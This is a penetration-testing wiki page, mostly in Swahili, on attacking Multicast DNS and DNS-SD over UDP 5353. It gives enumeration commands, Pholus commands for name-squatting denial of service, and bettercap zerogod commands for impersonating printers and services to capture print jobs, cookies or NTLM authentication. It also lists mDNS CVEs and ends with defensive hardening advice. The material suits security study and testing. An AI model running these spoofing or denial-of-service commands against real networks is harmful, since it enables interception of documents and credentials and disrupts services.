5353/UDP Multicast DNS (mDNS) na DNS-SD

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

Multicast DNS (mDNS) inaruhusu utatuzi wa majina kama ya DNS na ugunduzi wa huduma ndani ya kiunganishi cha ndani bila seva ya unicast DNS. Inatumia UDP/5353 na anwani za multicast 224.0.0.251 (IPv4) na FF02::FB (IPv6). DNS Service Discovery (DNS-SD, kawaida hutumika pamoja na mDNS) hutoa njia iliyostandardika ya kuorodhesha na kuelezea huduma kupitia rekodi za PTR, SRV na TXT.

PORT     STATE SERVICE
5353/udp open  zeroconf

Key protocol details you’ll often leverage during attacks:

• Majina katika eneo la .local yanatatuliwa kupitia mDNS.
• Bit ya QU (Query Unicast) inaweza kuomba majibu ya unicast hata kwa maswali ya multicast.
• Implementations zinapaswa kupuuza vifurushi visivyotokana na local link; baadhi ya stacks bado vinavikubali.
• Probing/announcing inalazimisha majina ya mwenyeji/huduma ya kipekee; kuingilia hapa kunaunda hali za DoS/“name squatting”.

Mfano wa huduma za DNS-SD

Huduma zinatambulishwa kama _._tcp au _._udp chini ya .local, kwa mfano _ipp._tcp.local (printers), _airplay._tcp.local (AirPlay), _adb._tcp.local (Android Debug Bridge), n.k. Gunduza aina kwa _services._dns-sd._udp.local, kisha tatua matukio yaliyopatikana hadi SRV/TXT/A/AAAA.

Uchunguzi wa Mtandao na Enumeration

• nmap target scan (direct mDNS on a host):

nmap -sU -p 5353 --script=dns-service-discovery <target>

• nmap broadcast discovery (listen to the segment and enumerate all DNS-SD types/instances):

sudo nmap --script=broadcast-dns-service-discovery

• avahi-browse (Linux):

# List service types
avahi-browse -bt _services._dns-sd._udp
# Browse all services and resolve to host/port
avahi-browse -art

• Apple dns-sd (macOS):

# Browse all HTTP services
dns-sd -B _http._tcp
# Enumerate service types
dns-sd -B _services._dns-sd._udp
# Resolve a specific instance to SRV/TXT
dns-sd -L "My Printer" _ipp._tcp local

• Packet capture with tshark:

# Live capture
sudo tshark -i <iface> -f "udp port 5353" -Y mdns
# Only DNS-SD service list queries
sudo tshark -i <iface> -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""

Vidokezo: Brawuza/WebRTC baadhi hutumia majina ya mwenyeji ya mDNS ya muda mfupi kufunika IP za ndani. Ikiwa unaona random-UUID.local kwenye wire, mtatua kwa mDNS ili pivot hadi IP za ndani.

Mashambulizi

mDNS name probing interference (DoS / name squatting)

Wakati wa hatua ya probing, mwenyeji hukagua uhalali wa jina. Kujibu kwa migongano iliyodanganywa kumlazimisha kuchagua majina mapya au kushindwa. Hii inaweza kuchelewesha au kuzuia usajili na ugunduzi wa huduma.

Mfano na Pholus:

# Block new devices from taking names by auto-faking responses
sudo python3 pholus3.py <iface> -afre -stimeout 1000

Huduma spoofing and impersonation (MitM)

Jifanya kuwa huduma za DNS-SD zinazotangazwa (printers, AirPlay, HTTP, file shares) ili kuwafanya wateja kuungana nawe. Hii ni hasa muhimu kwa:

• Kukamata nyaraka kwa spoofing _ipp._tcp au _printer._tcp.
• Kuwavutia wateja kwenye huduma za HTTP/HTTPS ili kukusanya tokens/cookies au kusambaza payloads.
• Changanya na NTLM relay techniques wakati wateja wa Windows wanapojaribu kufanya auth kwenye spoofed services.

Kwa bettercap’s zerogod module (mDNS/DNS-SD spoofer/impersonator):

# Start mDNS/DNS-SD discovery
sudo bettercap -iface <iface> -eval "zerogod.discovery on"

# Show all services seen from a host
> zerogod.show 192.168.1.42
# Show full DNS records for a host (newer bettercap)
> zerogod.show-full 192.168.1.42

# Impersonate all services of a target host automatically
> zerogod.impersonate 192.168.1.42

# Save IPP print jobs to disk while impersonating a printer
> set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
> zerogod.impersonate 192.168.1.42

# Replay previously captured services
> zerogod.save 192.168.1.42 target.yml
> zerogod.advertise target.yml

Angalia pia generic LLMNR/NBNS/mDNS/WPAD spoofing and credential capture/relay workflows:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Notes on recent implementation issues (useful for DoS/persistence during engagements)

• Avahi reachable-assertion and D-Bus crash bugs (2023) zinaweza kusababisha avahi-daemon kuacha kufanya kazi kwenye distributions za Linux (mfano CVE-2023-38469..38473, CVE-2023-1981), zikivuruga service discovery kwenye host za lengo hadi kurejeshwa.
• Cisco IOS XE Wireless LAN Controller mDNS gateway DoS (CVE-2024-20303) inaruhusu wateja wa WLAN walioko karibu kuzusha mDNS zilizotengenezwa kwa makusudi, ikiongeza mzigo wa CPU ya WLC na kupunguza AP tunnels—inafaa ikiwa unahitaji kulazimisha client roaming au controller resets wakati wa engagement.
• Apple mDNSResponder logic error DoS (CVE-2024-44183) inaruhusu mchakato wa ndani uliosandbox kusababisha Bonjour crash kwa muda mfupi na hivyo kusimamisha service publication/lookup kwenye endpoints za Apple; imepachikwa katika matoleo ya hivi karibuni ya iOS/macOS.
• Apple mDNSResponder correctness issue (CVE-2025-31222) iliruhusu local privilege escalation kupitia mDNSResponder; inaweza kutumika kwa persistence kwenye Macs/iPhones zisizosimamiwa, imekorekshwa katika masasisho ya hivi karibuni ya iOS/macOS.

Browser/WebRTC mDNS considerations

Chromium/Firefox za kisasa huficha host candidates kwa majina ya mDNS yasiyotarajiwa. Unaweza kuonyesha tena LAN IPs kwenye endpoints zinazosimamiwa kwa kusukuma sera ya Chrome WebRtcLocalIpsAllowedUrls (au kwa kubadili chrome://flags/#enable-webrtc-hide-local-ips-with-mdns/toleo la Edge) ili ICE iweze kuonyesha host candidates badala ya mDNS; seta kupitia HKLM\Software\Policies\Google\Chrome.

Wakati watumiaji wanazima ulinzi kwa mikono (kawaida katika mwongozo wa kutatua matatizo ya WebRTC), browsers zao huanza kutangaza tena host candidates wazi, ambazo unaweza kunasa kupitia mDNS au ICE signaling ili kuharakisha host discovery.

Defensive considerations and OPSEC

• Segment boundaries: Usirute 224.0.0.251/FF02::FB kati ya security zones isipokuwa mDNS gateway itakapotakiwa waziwazi. Ikiwa lazima upatanishe discovery, njia bora ni kutumia allowlists na rate limits.
• Windows endpoints/servers:
• Ili kuzima kabisa name resolution kupitia mDNS, weka thamani ya registry kisha restart:

HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)

• Katika mazingira yasiyosahaulika, zima sheria ya ndani ya Windows Defender Firewall “mDNS (UDP-In)” (angalau kwenye Domain profile) ili kuzuia usindikaji wa mDNS unaoingia huku ukihifadhi uwezo wa home/roaming.
• Katika builds mpya za Windows 11/GPO templates, tumia sera “Computer Configuration > Administrative Templates > Network > DNS Client > Configure multicast DNS (mDNS) protocol” na uitoe (set it to Disabled).
• Linux (Avahi):
• Funga uchapishaji wakati hauhitajiki: weka disable-publishing=yes, na zuia interfaces kwa allow-interfaces= / deny-interfaces= katika /etc/avahi/avahi-daemon.conf.
• Angalia kuweka check-response-ttl=yes na epuka enable-reflector=yes isipokuwa inahitajika kwa ukali; pendelea reflect-filters= allowlists unapofanya reflection.
• macOS: Zuiia mDNS inayokuja kwenye firewalls za host/network pale Bonjour discovery haifai kwa subnets maalum.
• Monitoring: Taarifu kuhusu mwendo wa kawaida wa kuongezeka kwa maombi ya _services._dns-sd._udp.local au mabadiliko ghafla katika SRV/TXT ya huduma muhimu; hizi ni viashiria vya spoofing au service impersonation.

Tooling quick reference

• nmap NSE: dns-service-discovery and broadcast-dns-service-discovery.
• Pholus: active scan, reverse mDNS sweeps, DoS and spoofing helpers.

# Passive sniff (timeout seconds)
sudo python3 pholus3.py <iface> -stimeout 60
# Enumerate service types
sudo python3 pholus3.py <iface> -sscan
# Send generic mDNS requests
sudo python3 pholus3.py <iface> --request
# Reverse mDNS sweep of a subnet
sudo python3 pholus3.py <iface> -rdns_scanning 192.168.2.0/24

• bettercap zerogod: discover, save, advertise, and impersonate mDNS/DNS-SD services (see examples above).

Spoofing/MitM

Shambulio lenye kuvutia zaidi unaloweza kufanya kupitia huduma hii ni kufanya MitM katika mawasiliano kati ya client na server halisi. Unaweza kupata faili nyeti (fanya MitM kwenye mawasiliano na printer) au hata credentials (Windows authentication).
Kwa habari zaidi angalia:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

References

• Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things
• Nmap NSE: broadcast-dns-service-discovery
• bettercap zerogod (mDNS/DNS-SD discovery, spoofing, impersonation)
• Cisco IOS XE WLC mDNS gateway DoS (CVE-2024-20303) advisory
• Rapid7 advisory for Apple mDNSResponder CVE-2024-44183
• Rapid7 writeup of Apple mDNSResponder CVE-2025-31222

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.